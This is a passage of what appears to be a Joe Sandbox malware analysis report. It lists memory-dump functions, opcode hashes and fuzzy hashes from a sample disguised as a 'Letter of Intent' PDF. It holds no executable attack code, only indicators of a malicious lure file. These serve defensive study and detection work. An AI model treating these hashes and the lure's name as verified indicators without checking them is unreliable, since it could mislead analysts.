                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e2d645aaac4e71309f457085dc06789f04a7c22ff9bc51d4a9cb4497baadb99
                                                                                      • Instruction ID: d7619ec0ed6a0fe8dc2a4e875abe642a704aa5bc4f4314adc2d1d773610b6ac3
                                                                                      • Opcode Fuzzy Hash: 5e2d645aaac4e71309f457085dc06789f04a7c22ff9bc51d4a9cb4497baadb99
                                                                                      • Instruction Fuzzy Hash: 11F082B1A0024CEBDB04DBA9C559E9EB7F4EF08704F4404A9F601EB281D9B4D9008B58
                                                                                      Function 3304FBF3 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da1d7cd3560e5b4c443df8b10d97563fd4113190625460734c8b5dfb5c920fb1
                                                                                      • Instruction ID: 3a3cdde5b6a3f8b2136aa486f606715a16ece97107d6ab6350542ea035654fc4
                                                                                      • Opcode Fuzzy Hash: da1d7cd3560e5b4c443df8b10d97563fd4113190625460734c8b5dfb5c920fb1
                                                                                      • Instruction Fuzzy Hash: 3EF082B1A00248ABDB04EBA9D559E9EB7F4EF08704F4448A4E601EB280E9B4D9018B18
                                                                                      Function 32FC55C0 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                      • Instruction ID: 61f380677d054f911caac6ee0d4d0f319b18a38d35da2f0f608a6472c81c7a38
                                                                                      • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                      • Instruction Fuzzy Hash: 26E0E533110725ABD2150A16DD00F12FBA9FF507B0F144D15A65827690CBA4EC11CAD4
                                                                                      Function 330637B6 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                      • Instruction ID: ce8bb1bb05d1d99a6eb6558c3ed783b02ff62ebccfcaad745c4f665db28fd38a
                                                                                      • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                      • Instruction Fuzzy Hash: 79E06DB2210200BFD764CB64DD01FA673ECEB00760F540698B615930E0DAB0AE40CBA0
                                                                                      Function 32FBDAAE Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fba1a1ac6ad799d61c2ddc326d185083a10fe0a07a476c97b5d34b5c0ba45396
                                                                                      • Instruction ID: d389dea72a9c1766d479a35da49568e192db8d3f7b98a08077f671fe1c3263ed
                                                                                      • Opcode Fuzzy Hash: fba1a1ac6ad799d61c2ddc326d185083a10fe0a07a476c97b5d34b5c0ba45396
                                                                                      • Instruction Fuzzy Hash: 0CF08C71500B508FD724CF18D240B92B3A8EF85724F14CA9CE55A8B691C776D883CB80
                                                                                      Function 3304B3D0 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                      • Instruction ID: 3856d17873c979e83067fc5fc9400242276fceceb580e208711c4c20592c480d
                                                                                      • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                      • Instruction Fuzzy Hash: CFE0C231284214BBEB221A40DC00F69BB99DF807E1F104031FB486AA90CAB1ED91DAD4
                                                                                      Function 330192BC Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 982385d8124e80983b9ff483b48b7bf9474319f5c27d9a469ac5fe6d9ef248ce
                                                                                      • Instruction ID: 7ebd579ecf02aaaf270c99f261da8637959e0fb91cdb596ea782f584004eb264
                                                                                      • Opcode Fuzzy Hash: 982385d8124e80983b9ff483b48b7bf9474319f5c27d9a469ac5fe6d9ef248ce
                                                                                      • Instruction Fuzzy Hash: 2EF0E578651B84CFE71ADF04C1E1B5173F9FB85B40F900498D4878FBA1C73AA942CA80
                                                                                      Function 33025AD0 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c545d50f61dea5e671e22edea6ff08ade0f67ffca453c31370c0e8b5fadfe58e
                                                                                      • Instruction ID: 7305622ba4660edba34e966f60fa3625398ffa1ec51787d4b051e5107115da04
                                                                                      • Opcode Fuzzy Hash: c545d50f61dea5e671e22edea6ff08ade0f67ffca453c31370c0e8b5fadfe58e
                                                                                      • Instruction Fuzzy Hash: B0E08632554744AFE3218A49D805F43FBD9DB15370F05C869F55987951C7B9F880CF94
                                                                                      Function 32F8B562 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                      • Instruction ID: 136c51dddbe3ccddcda3ce277ba7bcf31a0b69161daad514c39a06b199ef95cf
                                                                                      • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                      • Instruction Fuzzy Hash: A1D05E31161660AFC7325F11EE01F82BBF6AF80F10F450D28B2016A9F48AE1ED85CA94
                                                                                      Function 3301930B Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                      • Instruction ID: ac1067a9aae7c59bfbe4651f756c293ff7289920b7d22d938ea3ba1b1ffb48d7
                                                                                      • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                      • Instruction Fuzzy Hash: 58D01779941AC48FE317CB04C161B407BF8F705B40F890098E08347AA2C27C9984CB40
                                                                                      Function 32F8BA10 Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 427ca6eb96b90581979905a4aca713d96a8f2b591aa70216cf78c0d13fec8dd2
                                                                                      • Instruction ID: 38090f6aef60a150a81d83f4959f20cbe3c85fad77fdc8c70e3b7d6eb8b7e476
                                                                                      • Opcode Fuzzy Hash: 427ca6eb96b90581979905a4aca713d96a8f2b591aa70216cf78c0d13fec8dd2
                                                                                      • Instruction Fuzzy Hash: BDC08C32190248BFC7129A91DD01F02BBAAE790BA0F000421BA0446560C572E860DA84
                                                                                      Function 32FB340D Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                      • Instruction ID: 87597a6b77994b964b7a88b4a6cb2b58505206cda91d31b000933033d9941d3b
                                                                                      • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                      • Instruction Fuzzy Hash: B4C08CB81A1580BEEF0B6701CE10B283690AF0078AFC0099CAF40294A1C3EAE8028718
                                                                                      Function 32F8BAE0 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                      • Instruction ID: fc1986c601cedd7f92af4ee48a60a5c8633346984d063c762816450adda72223
                                                                                      • Opcode Fuzzy Hash: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                      • Instruction Fuzzy Hash: FBC08C32080248BBC7125A42DD00F01BB6AE7A0BA0F000020BA040A5608572E8A0DA88
                                                                                      Function 32FBBADA Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                      • Instruction ID: c8a9d57f3147f6c1f7ae617d89f90e659f56ea70a625e885bb57e4e2987abec3
                                                                                      • Opcode Fuzzy Hash: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                      • Instruction Fuzzy Hash: 3DC02B701504C09ADF054B30CCD0F20337CFF00B22FA00B547320864F0C9A89C00D900
                                                                                      Function 32FD3090 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1bcc6d1efd44d3e520fb4e92c13e71c3be2cee1deb4c0e692c50d901a51a2c94
                                                                                      • Instruction ID: acbb0c763cc5b6434d3014ee1b787257d51b50b09e55b1827bf0eb8a89b30f54
                                                                                      • Opcode Fuzzy Hash: 1bcc6d1efd44d3e520fb4e92c13e71c3be2cee1deb4c0e692c50d901a51a2c94
                                                                                      • Instruction Fuzzy Hash: 1390022124140813D1417158D514707000687D0A01F55C412A1034515D86168A6966F2
                                                                                      Function 32FD3010 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 39d20e581e2d900c24cd025070db0d263db29eaa4e0c807ea2ea51de3aae4cf9
                                                                                      • Instruction ID: f8b399d3f5759dc2d9ed2b00dfe5b74cde56145ec137cde783ec68cfac711f2e
                                                                                      • Opcode Fuzzy Hash: 39d20e581e2d900c24cd025070db0d263db29eaa4e0c807ea2ea51de3aae4cf9
                                                                                      • Instruction Fuzzy Hash: D890022120184453D14172589904B0F410547E1602F95C41AA5166515CC91589595762
                                                                                      Function 32FD39B0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 47cdb026f4912661cbbdcbd35cd4575ba39393c1f950ee8e2510a1e9e3efba10
                                                                                      • Instruction ID: e1a03ba1ac91a4a9d8f6372daf3371f8bd7f0452f11e00beb53bcf5f1d63b8c7
                                                                                      • Opcode Fuzzy Hash: 47cdb026f4912661cbbdcbd35cd4575ba39393c1f950ee8e2510a1e9e3efba10
                                                                                      • Instruction Fuzzy Hash: E090043134545113D151715CD504717400577F0701F55C433F1C34555DC555CD5D7373
                                                                                      Function 32FD3D70 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2ea52b187b355d6f4af0b6684c5138a1ee5e2f5cb921b77306d7dac1eb14a20
                                                                                      • Instruction ID: cc2ab41d26ebb8335d4ecef13af3ebf0925c20d275f4c24c86646ed9f06f32b7
                                                                                      • Opcode Fuzzy Hash: f2ea52b187b355d6f4af0b6684c5138a1ee5e2f5cb921b77306d7dac1eb14a20
                                                                                      • Instruction Fuzzy Hash: 1890023520140413D5117158A904646004647D0701F55D812A1434519D865489A5A162
                                                                                      Function 32FD3D10 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9e0c86a8d06ea19a2eaab4dba9897145ca00d7d9b4e03c3840ea2b2fbeac8a3
                                                                                      • Instruction ID: 4156458b6c87c0fdfcd2650087c31ae7f19e80a0fac65b1b4754fbdb84a3f443
                                                                                      • Opcode Fuzzy Hash: b9e0c86a8d06ea19a2eaab4dba9897145ca00d7d9b4e03c3840ea2b2fbeac8a3
                                                                                      • Instruction Fuzzy Hash: 199002312024015395417258A904A4E410547E1702B95D816A1025515CC91489655262
                                                                                      Function 32FD4340 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1136412aa5b18779ba05ceab76219432f3ac7ba726c627c33dd8b4c16a0a29f1
                                                                                      • Instruction ID: 5e5cea6d210404ac99be0eda0c75161cd7aa36d6752e89562d1e85d0b308b1d5
                                                                                      • Opcode Fuzzy Hash: 1136412aa5b18779ba05ceab76219432f3ac7ba726c627c33dd8b4c16a0a29f1
                                                                                      • Instruction Fuzzy Hash: 6C90023160580023914171589984546400557E0701B55C412E1434515C8A148A5A53A2
                                                                                      Function 32FD4650 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe8e3361cac6babe9c4716cf8d74e7838325706a52844a116e1cae8a44549259
                                                                                      • Instruction ID: 08ae927ba88d7156952dc78b6e7685a03479771a6de97114eef7507578e7a98b
                                                                                      • Opcode Fuzzy Hash: fe8e3361cac6babe9c4716cf8d74e7838325706a52844a116e1cae8a44549259
                                                                                      • Instruction Fuzzy Hash: C090026160150053414171589904406600557E1701395C516A1564521C8618895992AA
                                                                                      Function 32FD2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fcbe4542230be29dcb6302873fe380bf01de97ecda7a308b6bcca76fec0e9f90
                                                                                      • Instruction ID: d201f956a8c4f4d4a18bcec6a5af46aad6936c140f4f571ca7118ac82c7e4144
                                                                                      • Opcode Fuzzy Hash: fcbe4542230be29dcb6302873fe380bf01de97ecda7a308b6bcca76fec0e9f90
                                                                                      • Instruction Fuzzy Hash: 23900225221400130146B558570450B044557D6751395C416F2426551CC62189695362
                                                                                      Function 32FD2AD0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
